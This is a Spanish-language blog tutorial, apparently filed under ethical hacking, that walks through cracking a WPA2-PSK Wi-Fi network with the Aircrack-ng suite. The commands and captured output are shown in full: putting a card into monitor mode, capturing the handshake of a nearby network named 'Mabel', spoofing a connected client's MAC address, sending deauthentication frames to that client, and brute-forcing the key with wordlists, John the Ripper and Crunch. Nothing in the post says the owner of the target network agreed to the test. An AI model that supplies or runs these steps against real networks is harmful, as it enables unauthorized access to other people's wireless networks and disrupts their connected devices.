Sitio para la difusión de conocimiento informático. 

Twitter RSS

Aircrack-ng – Ejemplo con WEP/WPA/WPA2

Aircrack-ng – Ej. WEP/WPA/WPA2

Aircrack-ng es una suite de software de seguridad inalámbrica. Consiste en un analizador de paquetes de redes, un crackeador de redes WEP y WPA/WPA2-PSK y otro conjunto de herramientas de auditoría inalámbrica.

Las herramientas más utilizadas para la auditoría inalámbrica son:

  • Aircrack-ng (descifra la clave de los vectores de inicio)
  • Airodump-ng (escanea las redes y captura vectores de inicio)
  • Aireplay-ng (inyecta tráfico para elevar la captura de vectores de inicio)
  • Airmon-ng (establece la tarjeta inalámbrica en modo monitor, para poder capturar e inyectar vectores)

La suite está diseñada para trabajar con una distribución Linux, aunque también existe una versión para Windows que no es muy estable debido a conflictos con drivers.

En esta publicación veremos un ejemplo del uso de estas herramientas para romper la seguridad de las redes wireless WEP/WPA/WPA2.

 Los pasos a seguir son los siguientes:
1) Verificamos que nuestra tarjeta de red Wifi soporta el modo “monitor”.
2) Instalamos Aircrack-ng.
3) Pasos a seguri con Aircrack-ng:

  1. Colocar la interface wireless en modo monitor y especificar el canal del AP
  2. Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el handshake
  3. Usar aireplay-ng para deautentificar a un cliente conectado
  4. Ejecutar aircrack-ng para obtener la clave pre-compartida usando ese handshake

 

 

1) Verificamos que nuestra tarjeta de red Wifi soporta el modo “monitor”:

– Ejecutamos el comando “iw list” para desplegar los modos que soporta nuesta tarjeta de red. La salida del comando tendrá una sección similar a la detallada a continuación:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
Según esta salida nuestra tarjeta soporta el modo “monitor”, por lo que es apta para poder continuar con nuestro objetivo.

 

2) Instalamos Aircrack-ng:

– Ubuntu/Debian: apt-get install aircrack-ng && apt-get build-dep aircrack-ng
– RedHat/fedora: yum -y install aircrack-ng
– En caso de no contar con el paquete en nuestros repositorios, descargamos aircrack desde el sitio oficial: http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz
– Procedemos a ejecutar los sigueintes comandos para su instalación:
tar xfz aircrack-ng-0.7.tar.gz
cd aircrack-ng-0.7
make
make install
– Por más información: http://www.aircrack-ng.org/doku.php?id=es:newbie_guide#instalacion_de_aircrack-ng

 

3) Basicamente los pasos que vamos a recorrer con aircrack

3.1) Colocar la interface wireless en modo monitor y especificar el canal del AP:

– Ejectuamos el siguiente comando para colocar nuestra tarjeta de red en modo “monitor”: airmon-ng stop wlan0 && airmon-ng start wlan0
– Ejecutamos “airodump-ng” para comenzar a ver las redes que tenemos cerca y seleccionar la red objetivo: airodump-ng wlan0
Ej: airodump-ng wlan0

  CH 13 ][ Elapsed: 0 s ][ 2014-08-18 17:36
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FC:F5:28:49:4D:08 -1 0 0 0 138 -1 <length: 0>
54:22:F8:93:A1:3B -1 0 2 0 138 -1 WPA <length: 0>
B4:14:89:1B:6B:B1 -76 3 0 0 6 54e. OPN <length: 1>
B4:14:89:5A:35:82 -72 2 0 0 1 54e. WPA2 CCMP MGT <length: 1>
6C:9C:ED:B5:01:A1 -84 2 0 0 1 54e. OPN <length: 1>
54:22:F8:93:C5:A8 -82 7 0 0 8 54e WPA2 CCMP PSK Mabel

BSSID STATION PWR Rate Lost Packets Probes
FC:F5:28:49:4D:08 D0:51:62:F5:85:CD -84 0 – 1 0 3
54:22:F8:93:A1:3B E4:D5:3D:BA:86:BA -83 0 – 5e 11 2

 

3.2) Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el handshake:

Seleccionamos la red a atacar y el canal que está utiliza y comenzamos a capturar paquetes IVs esperando capturar el Handshake:
airodump-ng wlan0 -d 54:22:F8:93:C5:A8 -w mabel.cap -c 8

– Podemos ver si ya se capturó un handshake ejecutando “aircarck-ng mabel.cap.cap”, y nos mostrará si fue exitosa la captura o no: aircrack-ng mabel.cap.cap
Opening mabel.cap-02.cap
Read 126236 packets.

# BSSID ESSID Encryption
1 54:22:F8:93:C5:A8 Mabel WPA (1 handshake)

En este caso, luego de algunos minutos capturando paquetes con un poco de suerte logramos capturar un handshake. En caso de querer forzar uno podemos proceder a hacer una deautenticación.

 

3.3) Usar aireplay-ng para deautentificar a un cliente conectado

– Debemos seleccionar un cliente para poder usar su dirección MAC para así enviar un mensaje de “deautenticación”. Para esto volvemos al comando “airodump-ng”, y vemos en la sección “stations” cuales están conectadas al AP en cuetión:
CH 8 ][ Elapsed: 1 hour 37 mins ][ 2014-08-18 17:35 ][ WPA handshake: 54:22:F8:93:C5:A8
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
54:22:F8:93:C5:A8 -84 74 25239 226 0 8 54e WPA2 CCMP PSK Mabel
BSSID STATION PWR Rate Lost Packets Probes
54:22:F8:93:C5:A8 00:24:2C:45:2F:BC -86 1e- 1e 41 24268 Mabel

– En este caso tenemos la dirección MAC del cliente 00:24:2C:45:2F:BC. Procedemos a configurar dicha dirección MAC en nuesta tarjeta de red y así enviar un mensaje de desautenticación falso para así forzar a dicho cliente a reautenticarse:
ifconfig wlan0 hw ether 00:24:2C:45:2F:BC
o podemos utilizar la herramienta macchanger:
macchanger wlan0 -m 00:24:2C:45:2F:BC

– Luego, utilizamos aireplay-ng para enviar nuestro mensaje de desautenticación. El sigueinte comando enviará 10 mensajes de deautenticación con el argumento -0, al BSSID especificado con el comando el argumento -a, para desautenticar al cliente con MAC especificada con el argumento -c:
aireplay-ng -0 10 -a 54:22:F8:93:C5:A8 -c 00:24:2C:45:2F:BC wlan0

– Luego de agunos minutos (ser pacientes), volvemos a verificar si capturamos el handsake usando el comando “aircrack-ng mabel.cap.cap”.

 

3.4) Ejecutar aircrack-ng para obtener la clave pre-compartida usando ese handshake:

– La efectividad de este paso se basa en la calidad de nuesto diccionario de palabras utilizado para encontrar la contaseña. Para este paso podemos utilizar las herramientas “John the ripper” y “Crunch”:

1) Usando nuestra lista de palabras. Para esto creamos un archivo de texto que contenga las palabras de nuestro diccionario línea por línea:
aircrack-ng -w diccionario.txt -b 54:22:F8:93:C5:A8 mabel.cap.cap

2) Usando todas las combinaciones poribles con John (no optimo):
john –stdout –incremental | aircrack-ng mabel.cap.cap -b 54:22:F8:93:C5:A8 -w – mabel.cap.cap

3) Usando todas las combianciones poribles con Crunch para contraseñas de minimo 8 caracteres, y máximo 8 caracteres, letras y números, mayúsuclas y minúsculas (no optimo):
crunch 8 8 1234567890abcdefghijklmnñopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ  | aircrack-ng -b 54:22:F8:93:C5:A8 -w – mabel.cap.cap

 

Nota: Esta publicación es solo un ejemplo, el tutrial completo se encuentra en:http://www.aircrack-ng.org/doku.php?id=es:cracking_wpa.
En las sigueintes publicaciones mostraremos como usar John the Ripper y Crunch para generar diccionarios de forma óptima para nuestro ataque.

 
Home Ethical Hacking Aircrack Aircrack-ng – Ejemplo con WEP/WPA/WPA2